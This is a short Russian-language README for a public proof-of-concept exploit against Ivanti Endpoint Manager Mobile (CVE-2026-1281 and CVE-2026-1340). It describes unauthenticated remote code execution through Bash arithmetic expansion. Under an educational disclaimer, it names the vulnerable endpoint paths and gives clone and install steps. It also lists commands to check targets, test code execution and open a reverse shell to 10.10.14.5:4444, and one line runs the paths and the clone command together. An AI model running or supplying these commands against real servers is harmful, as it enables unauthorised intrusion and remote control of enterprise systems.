
# PoC для CVE-2026-1281 и CVE-2026-1340 — Ivanti EPMM Pre-Auth RCE через арифметическое расширение Bash
⚠️ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Данный PoC предоставляется исключительно в образовательных целях и для исследований в области безопасности. Использование без явного разрешения незаконно.
Полный Proof of Concept (PoC) для эксплуатации уязвимостей CVE-2026-1281 и CVE-2026-1340, затрагивающих Ivanti Endpoint Manager Mobile (EPMM). Эти уязвимости позволяют выполнять произвольный код удалённо (RCE) без аутентификации через механизм Bash Arithmetic Expansion.
/mifs/c/appstore/fob//mifs/c/aftstore/fob/git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
cd CVE-2026-1281-Ivanti-EPMM-RCE
pip3 install -r requirements.txt
chmod +x *.py
# Проверка уязвимости
python3 exploit.py -t https://target.com -c
# Проверка RCE
python3 exploit.py -t https://target.com --test-rce
# Reverse shell
python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444
Mehdi Le Deaut — Консультант по кибербезопасности | Специалист Red Team
Этот проект распространяется под лицензией MIT — см. файл LICENSE для получения подробной информации.